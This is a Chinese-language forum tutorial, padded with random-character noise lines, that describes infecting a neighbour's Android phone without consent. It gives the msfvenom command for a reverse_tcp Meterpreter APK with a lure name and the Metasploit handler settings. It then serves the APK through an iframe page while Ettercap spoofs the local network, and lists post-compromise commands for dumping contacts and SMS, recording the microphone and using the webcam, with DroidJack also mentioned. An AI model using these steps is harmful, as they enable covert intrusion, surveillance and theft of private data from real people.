|
, Q; g; m' `+ `
五、msf+ettercap入侵邻居安卓手机 1 |* g; m2 D! l2 l
2 k5 ?& ^+ R1 S
9 n& z4 S2 S# x1 k 首先启动msf
; C. j8 ?5 Z8 [# y " @+ ~* J F- V5 C* w
! @6 p' ]% w1 m7 I, K 先用kali生成一个安卓木马,如下命令: ! d" A: F. u0 k ^' M
/ E) }! l% v; K0 S9 o: ^
% T5 @; H+ G8 ] r Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
. B3 N" u0 R! S5 S# S4 V
% m1 p* v. K4 q" p9 V: P, U+ F9 u; f
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 5 H' R9 z6 p6 i7 z
- x% P3 }; p6 H6 i. V
9 A( R! }& {4 G( F$ i C: t% H 然后进入msf " {# O. G; t( T& D- K1 k
2 ]" K" B: w$ l' O! @3 p
* T4 X$ [9 S- V; x1 [3 \ use exploit/multi/handler ! C) {$ q' f# S
% D+ y5 ], k, k' f2 m# e' q2 k0 z8 q4 k' Y
set payload android/meterpreter/reverse_tcp
6 B+ P; u2 \% V. W5 e$ T + W1 H0 ^* @2 ^/ i
% x5 U4 \+ ^( u. U1 B7 x: l& b
set LHOST 192.168.0.109 //ip为kaili的ip
( }. y- f: X1 f$ g5 M) e! | 4 ~7 S8 w* }4 i( P; K) e8 M3 ]9 e/ Q
; f T" n, P' ]9 }4 Z3 M set LPORT 44444 //端口一定要与前面生成的木马的端口一致
! L- U# y) @3 O4 A2 D7 t" ? ' @5 I2 u' O" K7 |
, T4 _+ N+ M0 o; y
Exploit & N' Q- t% E3 j% p/ m
0 p! ]' \/ P6 t9 k$ t& G/ f' `% B/ D, e1 v+ L, K
/ k* ]- k! q# i9 _6 a3 Z % S v% U9 W- V
" V4 q/ Z0 h0 W! X6 j
下面我们开启ettercap -G
{, V; `$ v$ ?; t* F* g
9 G" w2 w" @5 b8 K# v$ j) T! x4 ^3 X" g' B+ K2 s' k7 A
我物理IP为 : ?; o2 g+ o3 y3 I0 p
4 Q. j, h1 m) W) {, w Z& _% v7 a n& @& |5 `
& J* v* L6 w7 a% q t0 Q! s - N! c) b- h& V q, @4 t+ k6 j
4 @( K; \/ D t3 C8 @ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 4 J2 b2 }. }* z+ |# o! c3 C
5 d& u @: a( K( X u" I& ^# e+ f
* C% @# `* Z: J7 h5 U# o6 F# U 下面我们来设置一下 7 f- C* ]% L7 X3 h$ _
, c# r2 M$ s# h. G5 w
* o# p2 e' Y$ v4 w# N8 o
8 T5 c' G; m; O- |" z0 ?1 ]
' q! W9 i( D6 `6 Z
# x0 @6 `+ z8 e* s9 L9 i 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
2 b! D' m, w+ u) `! j + [. c( z; y. o9 B1 {9 n% m, p
, o5 k9 l5 n( p) q. P
6 b) g# B2 u5 g& X 1 C0 w: c: l3 u/ P1 H
. R" Q+ g) A: D* A
8 m0 H% G' V! Z9 p4 p4 p8 Z
+ h" K) S# @# o0 f5 z
2 w9 x6 H: r6 M- [" A & N* t; [: Q |1 i# f" [
3 p2 F! R- d) U
: B8 O* u" U' Y* K / Q P3 [7 R& s; H8 U# w
3 R2 j: w6 v& _! u% U5 a
$ N, u9 w3 m0 X- M, P2 k2 ^ : N G4 T9 @. p3 i
8 o% N9 }/ [7 _/ m1 r* F
% }! ~2 Z; N8 e; g' z# J
* T* ^8 m& V) Y2 K$ P
, S* z. I( K7 W1 t: f
( K, k& ~' n ?+ ]
0 l$ {4 Y2 b# G% {% X
5 g! U, ] T+ u0 C$ M: d9 ^8 W
* S* o9 a F" G
6 ]4 ^, V3 L+ Z; o% w, _* l* \1 \
- k0 j, d8 b2 \- @/ B
/ n/ |5 f% U- @5 `. Z 5 y0 p+ }& _; t
* Z U0 r. o- ?3 j5 {5 O
6 S$ e+ O" Y3 |7 e, ~2 G " y( [* C: c2 K; c4 o
# h& i% `. f1 z8 x
* h# Q, r* b* p: j" z0 F
# }$ ~9 Y& U( R& R' U
4 @# C: I( p4 d% n- _' Q* Z
, `! h a; O" N7 \ ) w" o% b8 B/ O
# x. z& Q* k: U, M: G5 a
4 W2 F& N! G' }
' s2 Q3 Z, J5 d0 W 4 ^) `- q8 ]5 g$ z
- a% }0 O8 K2 f/ o. W
下面我们开始攻击
) H2 U9 y: |& L
+ \8 ?6 C, q. q: E) u9 N& E
/ Z: K( p0 i5 A; H6 [ |" L ! I" [' B: n/ u4 k$ w5 b. n7 ]
7 F% u/ _! X' B, r) q* k A
7 |! |8 ~" {2 X" F
8 J4 u8 @% S5 c 2 H4 ~. c/ ~0 i9 P. K
/ _# C+ s+ H R! P" J. X! H$ D
. l9 r$ G+ P. I
. w9 N+ p" _2 \( R: y
& R, n/ H: s3 B$ \$ j
: i {3 m- a% |2 V& ~# F" A; u( D / N; q* k: K9 y6 f
/ j/ R/ G0 _: n4 f( p
* x0 s; }* k1 q: D/ r ( h4 R9 g, Z6 w6 Q9 s- N
( C8 }" ?! e( m+ W$ n1 D9 u
大概过了5分钟多,发现反弹成功了
8 `- H' a r/ w" [
. v+ O" W$ P, s8 v0 G8 N5 _. {7 ?& I/ ]/ \+ {; s" i* Z& b
8 x2 t9 s& \/ J# _
2 V2 _# q6 W- y+ [1 O6 T. k+ `$ h% i8 E T. s. [4 W% g6 a, R
; f- \+ P0 | w+ q. s& S4 _- O
/ c( U) e6 p+ ? U: x6 O% S6 j; S2 k& l( _+ l% Z
+ Q1 t Z! V( F- h1 S4 X
% ?+ F- z) Z6 G; Y
0 m( y4 d7 `0 @, c. E+ b 8 N5 P* p( A1 l/ H5 o$ H1 m
2 @. Q: y/ [9 C& W5 y
0 m- f0 C) ]: [ V7 X5 y. c
! J6 d2 v; G! D. e/ F t! Z3 Z
3 H: o8 `: m$ d9 g) I) C5 M( ]. P- C, I% X6 D
; \! Y1 L. n/ _/ j( C
* G3 J: p7 Q ?
' H0 c: f6 E" T$ P2 j% U 2 Z& i7 x- b5 C- ~0 j6 c0 ~
. I. q) U! j B6 y6 [% o; f6 e; `
执行命令 F {- D5 K8 J. G1 H( y9 h
! [$ {) m7 `# m3 ^4 }+ T) f
: b7 Y' G8 `6 j6 n+ S
/ y b, S$ _" `8 o1 ?+ {
/ L' Z8 Y: `0 b
; b9 p9 X6 G4 _* @0 N! t dump_contacts --》这个是导出电话
$ u! A! Y% f [, U% \) F+ v / C7 p0 q) F8 C8 ?
+ ~' I( r S4 ]# O! `1 Z2 R
dump_sms --》这个是导出信息 9 B% g6 B; b( j8 h+ m
0 a4 T5 M. O" ^- R7 ^9 t$ T, K" P, ?+ P3 P5 ]4 x
record_mic Record audio from the default microphone for X seconds
, t) Z! w% M9 O/ x . |3 r* p H2 J$ \7 Y' y
/ \3 t `0 Z: h) _) h- n4 x
webcam_chat Start a video chat
2 D7 K5 t3 w# O/ a/ B0 s5 D4 y , m d- B7 u8 ?* a: ~
/ g$ c4 g" w: Q" S S9 { webcam_list List webcams 2 @# U. n$ Q) T7 Y/ A
7 ~, U3 s) w( k8 p1 ]+ N, \ f M+ z" G8 [' P7 _
webcam_snap Take a snapshot from the specified webcam
3 r* b( ^$ C. x6 j / a6 F, r8 Z* T( b# g" e( l
( w& Q: |& R9 l* P- w6 b |
webcam_stream   lay a video stream from the specified webcam ' c3 I% `/ ^2 }
]! A: k+ k3 {; h* ^& M
3 p, W& Q$ X- K+ ^! ]$ h& p/ p
" s" u$ B. J+ f: d7 Z# F
! a, L' e* M# g: p- X
: g8 r3 L8 C# b! d' ? C3 l ( o. I- G1 u) V! Z! p# B- O8 N
M3 y. N M& t, u
9 k4 M- w" L( y
我们打开看一下电话薄,
/ m1 i$ W2 K6 X5 O+ [
8 T& t5 w, L: ? Z5 k, F3 o2 [+ e+ z4 [
# B3 a6 U. J- P& C9 i
/ |/ H, H% v1 \' |9 z9 c
7 N. d0 S8 G F' Z7 I& H
( I+ i. m2 o% K 3 N4 I) G7 A# D
: r0 s" k R( v: U4 _
" M0 l6 q p) }& v
$ M, f V- d3 B2 k7 b/ I1 a+ g! b. y" L0 V
" w* h; O7 _( d& n - G, ~0 Y7 c' G3 [
( w9 i" G. a, h* i $ k0 J; v9 x$ l, g7 [# f
: S" Z. I/ A$ k, ?3 a) P5 U `# [1 f
$ T+ w! V1 O% i" }
% d: ?- i; L5 F8 U! z: }- N
4 k" R N+ r- y* N 我们同时欺骗成DroidJack木马,使用方法如图:
4 h) u# B3 x# {4 w; W ! C" `, [0 D1 r7 T! V8 [
8 a& I, [0 m1 q9 W
- q) {1 @) u/ S2 |3 T5 S k( \* b$ s, `
3 R8 K( b4 C- _ 4 o: v- @2 ~+ C
" w* h+ Z( q% U+ `* ~
, u4 @) h" Y- i+ w% F) G
5 _# c, n6 r$ `1 x; s
7 w1 y3 Z" }0 D6 P
! |5 S/ e4 a: p s; z' x1 e 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 z3 N1 R2 D$ ?
( i! [* u+ F. q& X0 m4 j @
3 |4 t3 n; h' p5 W( U( L
) X; ~9 h3 _9 ]8 r1 z2 t( Z, Q
4 n6 s! D* h3 N! c
+ w& K8 i& s1 N4 X: `
/ i- ^) w5 ]! I- _' _) ^1 Q
0 m* H5 Z$ `/ E+ ?+ U& ?$ v A+ i: ~# ^) H7 G% W% _5 t6 }
4 ^1 f5 g8 P2 G
1 w5 W- P+ f- x/ \
5 u6 x) J1 u# [4 J 
" P) K, V% J! g4 Z i * O9 O( K9 L" {0 v! v! r' ~* _
2 B3 G( P8 _5 P) V
3 Q+ j9 e$ K, B' o |